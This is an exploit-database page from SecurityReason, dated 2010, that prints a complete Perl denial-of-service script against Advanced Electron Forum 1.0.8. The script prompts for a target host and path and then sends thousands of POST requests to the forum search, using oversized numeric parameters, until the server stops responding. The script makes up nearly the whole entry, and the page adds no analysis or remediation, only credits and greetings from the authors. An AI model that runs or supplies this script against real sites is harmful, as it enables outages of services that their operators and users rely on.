|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : Ashiyane Digital Security Team Added by : Cair3x SecurityRisk : High  (About) Remote : No Local : Yes Status : Bug
Text : #### [+] Exploit Title: Electron Forum Multiple Search Denial Of Service Vulnerability [+] Date: 2010-02-3 [+] Author: Ashiyane Digital Security Members [+] Software Link: www.anelectron.com [+] Version: 1.0.8 [+] Tested on: AEF 1.0.8 [+] Dork: NON #### [Exploit] ------------------------------------------------------------------ #!/usr/bin/perl use IO::Socket; print q{ ################################################## # He Advanced Electron Forum Multiple Search DOS # # Tested on AEF 1.0.8 # # Created By Ashiyane Digital Security Team ! ;) # ################################################## }; $rand=rand(10); print "Forum Host: "; $serv = <stdin>; chop ($serv); print "Forum Path: "; $path = <stdin>; chop ($path); for ($i=0; $i<9999; $i++) { $postit = "index.php?act=search&sact=results&allwords=Cair3x&exactph rase=999999&atleastone=9999&without=999999&within=-19999999& ;starter=99999999999999&forums%5B%5D=0&showas=199999&search=%D8 %AC%D8%B3%D8%AA%D8%AC%D9%88"; $lrg = length $postit; my $sock = new IO::Socket::INET ( PeerAddr => "$serv", PeerPort => "80", Proto => "tcp", ); die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; print $sock "POST $path"."index.php?act=search HTTP/1.1\n"; print $sock "Host: $serv\n"; print $sock "Accept: text/_xml,application/_xml,application/xhtml+_xml,text/html;q=0 .9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; print $sock "Referer: $serv\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); ## Print a "+" for every loop syswrite STDOUT, "+"; } print "Forum Be Fuke Raft. Test Konid ...\n"; ----------------------------------------------------------------- [/Exploit] ################################################################# BY : Cair3x [Cair3x.Support@Gmail.com] Web Site : Ashiyane.org Forum : Http://Ashiyane.org/forums/ [+] Greetz to All Ashiyane Digital Security Member (And Virangar Good Frinds) #### If you want change this note, please use UCP
|
||||||||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |